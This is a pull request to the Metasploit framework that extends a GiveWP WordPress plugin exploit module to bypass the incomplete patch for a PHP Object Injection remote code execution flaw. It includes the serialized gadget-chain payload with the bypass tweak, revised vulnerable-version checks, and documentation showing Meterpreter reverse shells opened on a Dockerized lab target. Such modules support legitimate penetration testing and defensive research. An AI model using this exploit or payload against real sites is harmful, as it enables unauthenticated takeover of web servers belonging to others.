### PR TITLE
 Add bypass for GiveWP RCE (CVE-2024-8353) 

### DIFF
--- a/documentation/modules/exploit/multi/http/wp_givewp_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_givewp_rce.md
@@ -38,19 +38,23 @@ volumes:
   db_data:
 ```
 1. Run Docker: `docker compose up`
-1. Access the WordPress instance at `http://127.0.0.1` and complete the installation process
-1. **Download and Install Vulnerable GiveWP Plugin**:
-- Download the plugin: [GiveWP 3.14.1](https://downloads.wordpress.org/plugin/give.3.14.1.zip)
+2. Access the WordPress instance at `http://127.0.0.1` and complete the installation process.
+3. **Download and Install Vulnerable GiveWP Plugin**:
+- Download the plugin: [GiveWP 3.16.1](https://downloads.wordpress.org/plugin/give.3.16.1.zip)
 - Unzip the plugin and copy it to the Docker container:
 ```bash
 docker compose cp give wordpress:/var/www/html/wp-content/plugins
 ```
 - Access the WordPress instance at `http://localhost` and activate the GiveWP plugin via the admin dashboard.
 
-1. **Create a Donation Form**:
-  - Navigate to the "Forms" section within the GiveWP plugin and click on "Add Form."
-  - Select any form.
-  - Configure the form as needed, publish it.
+4. **Create a Donation Form**:
+- Navigate to the "Forms" section within the GiveWP plugin and click on "Add Form."
+- Select any form.
+- Configure the form as needed, then publish it.
+
+*Note: Depending on the vulnerability you want to test, using an older version like 3.14.1 may also be applicable.*
+
+
 
 ## Options
 
@@ -71,24 +75,49 @@ No specific options need to be configured.
 Using `cmd/linux/http/x64/meterpreter/reverse_tcp`:
 
 ```bash
-msf6 > use exploit/multi/http/wp_givewp_rce 
-[*] No payload configured, defaulting to cmd/linux/http/x64/meterpreter/reverse_tcp
-msf6 exploit(multi/http/wp_givewp_rce) > run http://127.0.0.1:8888
+msf6 exploit(multi/http/wp_givewp_rce) > run http://127.0.0.1:5555
 
-[*] Started reverse TCP handler on 192.168.1.36:4444 
+[*] Started reverse TCP handler on 192.168.1.36:1337 
 [*] Running automatic check ("set AutoCheck false" to disable)
-[*] WordPress Version: 6.3.2
+[*] WordPress Version: 6.5.3
 [+] Detected GiveWP Plugin version: 3.14.1
+[+] Vulnerable to both CVE-2024-5932 and CVE-2024-8353 (bypass).
 [+] The target appears to be vulnerable.
-[+] Successfully retrieved form list. Available Form IDs: 8, 10, 13
-[*] Using Form ID: 13 for exploitation.
-[*] Sending stage (3045380 bytes) to 172.24.0.3
-[*] Meterpreter session 1 opened (192.168.1.36:4444 -> 172.24.0.3:51272) at 2024-08-27 22:11:22 +0200
+[+] Successfully retrieved form list. Available Form IDs: 45
+[*] Using Form ID: 45 for exploitation.
+[*] Sending stage (3045380 bytes) to 172.18.0.3
+[*] Meterpreter session 5 opened (192.168.1.36:1337 -> 172.18.0.3:45656) at 2024-10-02 19:51:31 +0200
 
 meterpreter > sysinfo 
-Computer     : 172.24.0.3
-OS           : Debian 11.8 (Linux 5.15.0-119-generic)
+Computer     : 172.18.0.3
+OS           : Debian 11.8 (Linux 5.15.0-122-generic)
 Architecture : x64
 BuildTuple   : x86_64-linux-musl
 Meterpreter  : x64/linux
+meterpreter >
+```
+
+### GiveWP Plugin version: 3.16.1 (Dockerized WordPress Version 6.3.2)
+
+```bash
+msf6 exploit(multi/http/wp_givewp_rce) > run http://127.0.0.1:5555
+
+[*] Started reverse TCP handler on 192.168.1.36:1337 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] WordPress Version: 6.5.3
+[+] Detected GiveWP Plugin version: 3.16.1
+[+] Vulnerable to CVE-2024-8353 (bypass).
+[+] The target appears to be vulnerable.
+[+] Successfully retrieved form list. Available Form IDs: 38
+[*] Using Form ID: 38 for exploitation.
+[*] Sending stage (3045380 bytes) to 172.18.0.3
+[*] Meterpreter session 4 opened (192.168.1.36:1337 -> 172.18.0.3:49380) at 2024-10-02 19:49:39 +0200
+
+meterpreter > sysinfo 
+Computer     : 172.18.0.3
+OS           : Debian 11.8 (Linux 5.15.0-122-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
 ```

--- a/documentation/modules/exploit/multi/http/wp_givewp_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_givewp_rce.md
@@ -70,7 +70,7 @@ No specific options need to be configured.
 
 ## Scenarios
 
-### GiveWP Plugin version: 3.14.1 (Dockerized WordPress Version 6.3.2)
+### GiveWP Plugin version: 3.14.1 (Dockerized WordPress Version 6.5.3)
 
 Using `cmd/linux/http/x64/meterpreter/reverse_tcp`:
 
@@ -97,7 +97,7 @@ Meterpreter  : x64/linux
 meterpreter >
 ```
 
-### GiveWP Plugin version: 3.16.1 (Dockerized WordPress Version 6.3.2)
+### GiveWP Plugin version: 3.16.1 (Dockerized WordPress Version 6.5.3)
 
 ```bash
 msf6 exploit(multi/http/wp_givewp_rce) > run http://127.0.0.1:5555

--- a/documentation/modules/exploit/multi/http/wp_givewp_rce.md
+++ b/documentation/modules/exploit/multi/http/wp_givewp_rce.md
@@ -55,7 +55,6 @@ docker compose cp give wordpress:/var/www/html/wp-content/plugins
 *Note: Depending on the vulnerability you want to test, using an older version like 3.14.1 may also be applicable.*
 
 
-
 ## Options
 
 No specific options need to be configured.

--- a/modules/exploits/multi/http/wp_givewp_rce.rb
+++ b/modules/exploits/multi/http/wp_givewp_rce.rb
@@ -16,7 +16,8 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'GiveWP Unauthenticated Donation Process Exploit',
         'Description' => %q{
-          The GiveWP Donation Plugin and Fundraising Platform for WordPress, in all versions up to and including 3.16.1, is vulnerable to a PHP Object Injection (POI) attack that allows unauthenticated arbitrary code execution.
+          The GiveWP Donation Plugin and Fundraising Platform for WordPress, in all versions up to and including 3.16.1, 
+          is vulnerable to a PHP Object Injection (POI) attack that allows unauthenticated arbitrary code execution.
           Although a patch was introduced in version 3.14.2, it was incorrect and can be bypassed.
           This means the vulnerability remains exploitable in subsequent versions due to the ineffective patch.
         },

--- a/modules/exploits/multi/http/wp_givewp_rce.rb
+++ b/modules/exploits/multi/http/wp_givewp_rce.rb
@@ -16,7 +16,7 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'GiveWP Unauthenticated Donation Process Exploit',
         'Description' => %q{
-          The GiveWP Donation Plugin and Fundraising Platform for WordPress, in all versions up to and including 3.16.1, 
+          The GiveWP Donation Plugin and Fundraising Platform for WordPress, in all versions up to and including 3.16.1,
           is vulnerable to a PHP Object Injection (POI) attack that allows unauthenticated arbitrary code execution.
           Although a patch was introduced in version 3.14.2, it was incorrect and can be bypassed.
           This means the vulnerability remains exploitable in subsequent versions due to the ineffective patch.

--- a/modules/exploits/multi/http/wp_givewp_rce.rb
+++ b/modules/exploits/multi/http/wp_givewp_rce.rb
@@ -81,7 +81,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
     detected_version = check_plugin_version_from_readme('give')&.details&.dig(:version)
 
-    return print_warning('Unable to determine the GiveWP plugin version.') && CheckCode::Detected unless detected_version
+    if detected_version.nil?
+      print_warning('Unable to determine the GiveWP plugin version.')
+      return CheckCode::Unknown
+    end
 
     detected_version = Rex::Version.new(detected_version)
     print_good("Detected GiveWP Plugin version: #{detected_version}")

--- a/modules/exploits/multi/http/wp_givewp_rce.rb
+++ b/modules/exploits/multi/http/wp_givewp_rce.rb
@@ -16,7 +16,9 @@ class MetasploitModule < Msf::Exploit::Remote
         info,
         'Name' => 'GiveWP Unauthenticated Donation Process Exploit',
         'Description' => %q{
-          The GiveWP Donation Plugin and Fundraising Platform plugin for WordPress in all versions up to and including 3.14.1 is vulnerable to a PHP Object Injection (POI) attack granting an unauthenticated arbitrary code execution.
+          The GiveWP Donation Plugin and Fundraising Platform for WordPress, in all versions up to and including 3.16.1, is vulnerable to a PHP Object Injection (POI) attack that allows unauthenticated arbitrary code execution.
+          Although a patch was introduced in version 3.14.2, it was incorrect and can be bypassed.
+          This means the vulnerability remains exploitable in subsequent versions due to the ineffective patch.
         },
 
         'License' => MSF_LICENSE,

--- a/modules/exploits/multi/http/wp_givewp_rce.rb
+++ b/modules/exploits/multi/http/wp_givewp_rce.rb
@@ -89,7 +89,7 @@ class MetasploitModule < Msf::Exploit::Remote
     detected_version = Rex::Version.new(detected_version)
     print_good("Detected GiveWP Plugin version: #{detected_version}")
 
-    if detected_version < vuln_version_min
+    if detected_version < Rex::Version.new('3.14.2')
       print_good('Vulnerable to both CVE-2024-5932 and CVE-2024-8353 (bypass).')
       return CheckCode::Appears
     end

--- a/modules/exploits/multi/http/wp_givewp_rce.rb
+++ b/modules/exploits/multi/http/wp_givewp_rce.rb
@@ -22,15 +22,19 @@ class MetasploitModule < Msf::Exploit::Remote
         'License' => MSF_LICENSE,
         'Author' => [
           'Villu Orav',         # Initial Discovery
-          'EQSTSeminar',        # Proof of Concept
+          'EQSTLab',            # Proof of Concept
           'Julien Ahrens',      # Vulnerability Analysis
           'Valentin Lobstein'   # Metasploit Module
         ],
         'References' => [
           ['CVE', '2024-5932'],
-          ['URL', 'https://github.com/EQSTSeminar/CVE-2024-5932'],
+          ['URL', 'https://github.com/EQSTLab/CVE-2024-5932'],
           ['URL', 'https://www.rcesecurity.com/2024/08/wordpress-givewp-pop-to-rce-cve-2024-5932'],
-          ['URL', 'https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin']
+          ['URL', 'https://www.wordfence.com/blog/2024/08/4998-bounty-awarded-and-100000-wordpress-sites-protected-against-unauthenticated-remote-code-execution-vulnerability-patched-in-givewp-wordpress-plugin'],
+
+          ['CVE', '2024-8353'],
+          ['URL', 'https://github.com/EQSTLab/CVE-2024-8353'],
+          ['URL', 'https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give/givewp-donation-plugin-and-fundraising-platform-3161-unauthenticated-php-object-injection']
         ],
         'DisclosureDate' => '2024-08-25',
         'Platform' => %w[unix linux win],
@@ -67,12 +71,26 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     return CheckCode::Unknown unless wordpress_and_online?
 
+    vuln_version_1 = Rex::Version.new('3.14.2')
+
     print_status("WordPress Version: #{wordpress_version}") if wordpress_version
-    check_code = check_plugin_version_from_readme('give', '3.14.2')
+
+    check_code = check_plugin_version_from_readme('give')
     return CheckCode::Safe unless check_code.code == 'appears'
 
-    print_good("Detected GiveWP Plugin version: #{check_code.details[:version]}")
-    CheckCode::Appears
+    detected_version = Rex::Version.new(check_code.details[:version])
+    print_good("Detected GiveWP Plugin version: #{detected_version}")
+
+    if detected_version <= vuln_version_1
+      print_good('Vulnerable to both CVE-2024-5932 and CVE-2024-8353 (bypass).')
+      return CheckCode::Appears
+    elsif detected_version > vuln_version_1
+      print_good('Vulnerable to CVE-2024-8353 (bypass).')
+      return CheckCode::Appears
+    end
+
+    print_status("GiveWP Plugin version #{detected_version} is not vulnerable.")
+    CheckCode::Safe
   end
 
   def exploit
@@ -122,7 +140,7 @@ class MetasploitModule < Msf::Exploit::Remote
     give_form_id = form_id
     give_form_hash = form_data['data']
     give_price_id = '0'
-    give_amount = '$10.00'
+    give_amount = '10'
     # Somehow, can't randomize give_price_id and give_amount otherwise the exploit won't work.
 
     return unless give_form_hash
@@ -137,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def send_exploit_request(give_form_id, give_form_hash, give_price_id, give_amount)
     final_payload = format(
-      'O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";' \
+      '\\O:19:"Stripe\\\\\\\\StripeObject":1:{s:10:"\\0*\\0_values";a:1:{s:3:"foo";' \
       'O:62:"Give\\\\\\\\PaymentGateways\\\\\\\\DataTransferObjects\\\\\\\\GiveInsertPaymentData":1:{' \
       's:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\\0*\\0container";' \
       'O:33:"Give\\\\\\\\Vendors\\\\\\\\Faker\\\\\\\\ValidGenerator":3:{s:12:"\\0*\\0validator";' \

--- a/modules/exploits/multi/http/wp_givewp_rce.rb
+++ b/modules/exploits/multi/http/wp_givewp_rce.rb
@@ -74,23 +74,20 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     return CheckCode::Unknown unless wordpress_and_online?
 
-    vuln_version_1 = Rex::Version.new('3.14.2')
+    vuln_version_min = Rex::Version.new('3.14.2')
+    vuln_version_max = Rex::Version.new('3.16.2')
 
     print_status("WordPress Version: #{wordpress_version}") if wordpress_version
 
-    check_code = check_plugin_version_from_readme('give')
-    return CheckCode::Safe unless check_code.code == 'appears'
+    detected_version = check_plugin_version_from_readme('give')&.details&.dig(:version)
 
-    detected_version = Rex::Version.new(check_code.details[:version])
+    return print_warning('Unable to determine the GiveWP plugin version.') && CheckCode::Detected unless detected_version
+
+    detected_version = Rex::Version.new(detected_version)
     print_good("Detected GiveWP Plugin version: #{detected_version}")
 
-    if detected_version <= vuln_version_1
-      print_good('Vulnerable to both CVE-2024-5932 and CVE-2024-8353 (bypass).')
-      return CheckCode::Appears
-    elsif detected_version > vuln_version_1
-      print_good('Vulnerable to CVE-2024-8353 (bypass).')
-      return CheckCode::Appears
-    end
+    return CheckCode::Appears if detected_version < vuln_version_min && print_good('Vulnerable to both CVE-2024-5932 and CVE-2024-8353 (bypass).')
+    return CheckCode::Appears if detected_version >= vuln_version_min && detected_version < vuln_version_max && print_good('Vulnerable to CVE-2024-8353 (bypass).')
 
     print_status("GiveWP Plugin version #{detected_version} is not vulnerable.")
     CheckCode::Safe

--- a/modules/exploits/multi/http/wp_givewp_rce.rb
+++ b/modules/exploits/multi/http/wp_givewp_rce.rb
@@ -23,6 +23,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Author' => [
           'Villu Orav',         # Initial Discovery
           'EQSTLab',            # Proof of Concept
+          'cuokon',             # Bypass (CVE-2024-8353)
           'Julien Ahrens',      # Vulnerability Analysis
           'Valentin Lobstein'   # Metasploit Module
         ],

--- a/modules/exploits/multi/http/wp_givewp_rce.rb
+++ b/modules/exploits/multi/http/wp_givewp_rce.rb
@@ -86,8 +86,15 @@ class MetasploitModule < Msf::Exploit::Remote
     detected_version = Rex::Version.new(detected_version)
     print_good("Detected GiveWP Plugin version: #{detected_version}")
 
-    return CheckCode::Appears if detected_version < vuln_version_min && print_good('Vulnerable to both CVE-2024-5932 and CVE-2024-8353 (bypass).')
-    return CheckCode::Appears if detected_version >= vuln_version_min && detected_version < vuln_version_max && print_good('Vulnerable to CVE-2024-8353 (bypass).')
+    if detected_version < vuln_version_min
+      print_good('Vulnerable to both CVE-2024-5932 and CVE-2024-8353 (bypass).')
+      return CheckCode::Appears
+    end
+    
+    if detected_version < vuln_version_max 
+      print_good('Vulnerable to CVE-2024-8353 (bypass).')
+      return CheckCode::Appears
+    end
 
     print_status("GiveWP Plugin version #{detected_version} is not vulnerable.")
     CheckCode::Safe

--- a/modules/exploits/multi/http/wp_givewp_rce.rb
+++ b/modules/exploits/multi/http/wp_givewp_rce.rb
@@ -74,8 +74,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     return CheckCode::Unknown unless wordpress_and_online?
 
-    vuln_version_min = Rex::Version.new('3.14.2')
-    vuln_version_max = Rex::Version.new('3.16.2')
 
     print_status("WordPress Version: #{wordpress_version}") if wordpress_version
 

--- a/modules/exploits/multi/http/wp_givewp_rce.rb
+++ b/modules/exploits/multi/http/wp_givewp_rce.rb
@@ -90,8 +90,8 @@ class MetasploitModule < Msf::Exploit::Remote
       print_good('Vulnerable to both CVE-2024-5932 and CVE-2024-8353 (bypass).')
       return CheckCode::Appears
     end
-    
-    if detected_version < vuln_version_max 
+
+    if detected_version < vuln_version_max
       print_good('Vulnerable to CVE-2024-8353 (bypass).')
       return CheckCode::Appears
     end

--- a/modules/exploits/multi/http/wp_givewp_rce.rb
+++ b/modules/exploits/multi/http/wp_givewp_rce.rb
@@ -94,7 +94,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Appears
     end
 
-    if detected_version < vuln_version_max
+    if detected_version < Rex::Version.new('3.16.2')
       print_good('Vulnerable to CVE-2024-8353 (bypass).')
       return CheckCode::Appears
     end

--- a/modules/exploits/multi/http/wp_givewp_rce.rb
+++ b/modules/exploits/multi/http/wp_givewp_rce.rb
@@ -74,7 +74,6 @@ class MetasploitModule < Msf::Exploit::Remote
   def check
     return CheckCode::Unknown unless wordpress_and_online?
 
-
     print_status("WordPress Version: #{wordpress_version}") if wordpress_version
 
     detected_version = check_plugin_version_from_readme('give')&.details&.dig(:version)


### PR DESCRIPTION
Hello Metasploit Team,

I've added a bypass for the Remote Code Execution (RCE) vulnerability in the GiveWP plugin. 

This update includes:

- **Modified the exploit module** to incorporate the bypass, allowing the payload to work on all versions of the GiveWP plugin.
- **Updated the documentation** to reflect the changes and provide clearer instructions.
- **Adjusted the version check logic** to accurately detect vulnerable versions and account for the bypass.

Please review the changes at your convenience. Thank you